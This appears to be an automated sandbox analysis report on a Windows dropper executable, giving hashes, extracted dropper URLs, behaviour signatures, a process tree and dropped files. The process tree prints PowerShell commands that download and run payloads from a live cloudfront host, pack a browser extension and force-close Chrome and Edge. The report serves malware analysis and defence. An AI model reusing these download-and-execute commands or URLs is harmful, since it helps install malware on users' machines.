Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    247s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/05/2024, 22:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

  • Size

    49KB

  • MD5

    213c0265511727869c959abd24ea3677

  • SHA1

    22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9

  • SHA256

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

  • SHA512

    bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e

  • SSDEEP

    1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
    evasion
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
    "C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss66D9.tmp\est.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000','i0.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2124
      • C:\Users\Admin\AppData\Local\Temp\i0.exe
        i0.exe /verysilent /sub=1000
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5016
        • C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp" /SL5="$C01FE,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4132
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2148
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fffd6b39758,0x7fffd6b39768,0x7fffd6b39778
                7⤵
                  PID:3268
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\lazyhh.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""
              5⤵
                PID:4200
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /f /im "msedge.exe"
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3420
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /f /im "chrome.exe"
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2088
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        66382a4ca6c4dcf75ce41417d44be93e

        SHA1

        8132cbef1c12f8a89a68a6153ade4286bf130812

        SHA256

        a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

        SHA512

        2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        5c68c9f562003c17ef7606c9ec3789ea

        SHA1

        66397a728a9bdbe4dda6796d3f4670300433d6cd

        SHA256

        323e5ed61ef0ddf5995aba2092d907463d4980dcb72a469c527d1a7edf7ca00e

        SHA512

        dbea214e38214c2fc5091b84f9d8c51b54f4fe91625f4e0852abcee1cd8f31efe43cb84b29f561d17afb4f87c3883c4278e28fb4ded9741b17df5ddd49b7280e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        7fd04a079b5a2ce1e7be3b700b797de7

        SHA1

        753d12f778fa6347e21db7dd139914be636960fb

        SHA256

        2279f0d46c92d5a5d27a1e8c8d56427f4a5cf2d84a2461135fbacaca38f49e94

        SHA512

        9ebe29dde0293201d3b67fa45696d0b363c0f1abf575faa9182a584b4448856df8538b4a4cbe33dfe4c2d454036dc80f0aa16cadb2986dac83e2fe299cd42631

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m5kwxvo.vwm.ps1
        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\i0.exe
        Filesize

        3.5MB

        MD5

        b80362872ea704846e892f16aab924c3

        SHA1

        222b36b97d7978929c6fd2d3b1ff8bd8504a5a33

        SHA256

        d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e

        SHA512

        beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\chrome.zip
        Filesize

        47KB

        MD5

        52311257a997455c0a32e1679e0b614e

        SHA1

        395c475df7403e12651c8b6b1d52c33e5d7f3320

        SHA256

        50a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd

        SHA512

        19488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\dlls.manifest
        Filesize

        208B

        MD5

        963fb7657217be957d7d4732d892e55c

        SHA1

        593578a69d1044a896eb8ec2da856e94d359ef6b

        SHA256

        1d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12

        SHA512

        f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh.crx
        Filesize

        49KB

        MD5

        c8db22fe07b974833ff49b34ab65357d

        SHA1

        84f5dfd305c643e5df0b6866aa86d68aaad8c018

        SHA256

        820d53b44c4bf729ac20aa274e0a2c6720f841eddd42b90984b60d035dd3b68c

        SHA512

        d48ecb450233518e0244e99600e2c51e503692e133284cfd3932ea1c24cbafc08d4b05584e5b09ff5e6b114d1accde55a70b600620d26fad0446c476fafe9b6c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh.pem
        Filesize

        1KB

        MD5

        650bce794d69267d2219e7b1d2255c9d

        SHA1

        483e2097dea5b62c2d4c7a5b35a58a62f9fb4fb8

        SHA256

        e5061abe30c74dbd5e96fa4a403f83cf5388325f3d73a25ae43808caad6ad898

        SHA512

        84d4d02678d9f171f90e58777dd0502088bf2e600e1d3b149b8c9aa2bb549d6ddbfda912383179cf6606499fd371e88d9e2b7f021a7bdd322a4662265b7a26e7

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\icons\icon-128.png
        Filesize

        8KB

        MD5

        d57a101cf48bd00b5297596c081ece42

        SHA1

        47be9ca3d2a57788957bb6f91d9a6886c4252c0f

        SHA256

        a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5

        SHA512

        7110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\icons\icon-34.png
        Filesize

        3KB

        MD5

        ca00972a17d51a3e6a28cfc8711474e4

        SHA1

        c806ba3bcfb0b785aa4804843d332f425c66b7e0

        SHA256

        fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa

        SHA512

        9731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\js\background.js
        Filesize

        108KB

        MD5

        432c4c1300ba1c077fbd681f9667a104

        SHA1

        33482cd9df3a5ae20ad7f978f51bd35d2453c9ba

        SHA256

        adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04

        SHA512

        0ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\manifest.json
        Filesize

        438B

        MD5

        1d47eb945d1299c0e53bcada476d32b3

        SHA1

        509f9041f7e2a14402915feb4f2a739cfac5636b

        SHA256

        0a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a

        SHA512

        6d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp
        Filesize

        3.1MB

        MD5

        bdf5432c7470916ab3c25f031c4c8d76

        SHA1

        4762eeae811cfad7449a3d13fb1d759932c6d764

        SHA256

        72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903

        SHA512

        33ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nss66D9.tmp\est.bat
        Filesize

        735B

        MD5

        a07717f85edfb2fc3451641332db0216

        SHA1

        869a9d192d0a7dbf3aa1f1f22aaee14e0af6b213

        SHA256

        1a43e74b5a0de7183931ff4875993d780641c5fa0016fd6f3992490f64333e89

        SHA512

        0c16f2fe3d907ca391e52212cdfb9dab863a6d501e1d92c977f07e7fe392321948e6ad7e20e45cd8fe370b0d35049a56bde2dc5bf2ad50535f594eeccea3041a

        Download Submit

      • \Users\Admin\AppData\Local\Temp\nss66D9.tmp\INetC.dll
        Filesize

        25KB

        MD5

        40d7eca32b2f4d29db98715dd45bfac5

        SHA1

        124df3f617f562e46095776454e1c0c7bb791cc7

        SHA256

        85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

        SHA512

        5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

        Download Submit

      • memory/888-27-0x0000000006C00000-0x0000000006C66000-memory.dmp

        Filesize

        408KB

        Download

      • memory/888-23-0x0000000006DB0000-0x00000000073D8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/888-52-0x00000000727A0000-0x0000000072E8E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/888-47-0x00000000089A0000-0x00000000089BA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/888-46-0x0000000009280000-0x00000000098F8000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/888-31-0x0000000007B70000-0x0000000007BE6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/888-18-0x00000000727AE000-0x00000000727AF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/888-21-0x00000000066C0000-0x00000000066F6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/888-30-0x0000000007920000-0x000000000796B000-memory.dmp

        Filesize

        300KB

        Download

      • memory/888-29-0x0000000006C90000-0x0000000006CAC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/888-48-0x00000000727A0000-0x0000000072E8E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/888-28-0x0000000007550000-0x00000000078A0000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/888-26-0x00000000074E0000-0x0000000007546000-memory.dmp

        Filesize

        408KB

        Download

      • memory/888-25-0x0000000006740000-0x0000000006762000-memory.dmp

        Filesize

        136KB

        Download

      • memory/888-24-0x00000000727A0000-0x0000000072E8E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/888-22-0x00000000727A0000-0x0000000072E8E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/1496-86-0x0000000008550000-0x000000000859B000-memory.dmp

        Filesize

        300KB

        Download

      • memory/1496-83-0x0000000007A70000-0x0000000007DC0000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4132-236-0x0000000000400000-0x000000000072C000-memory.dmp

        Filesize

        3.2MB

        Download

      • memory/5016-76-0x0000000000400000-0x00000000004E9000-memory.dmp

        Filesize

        932KB

        Download

      • memory/5016-237-0x0000000000400000-0x00000000004E9000-memory.dmp

        Filesize

        932KB

        Download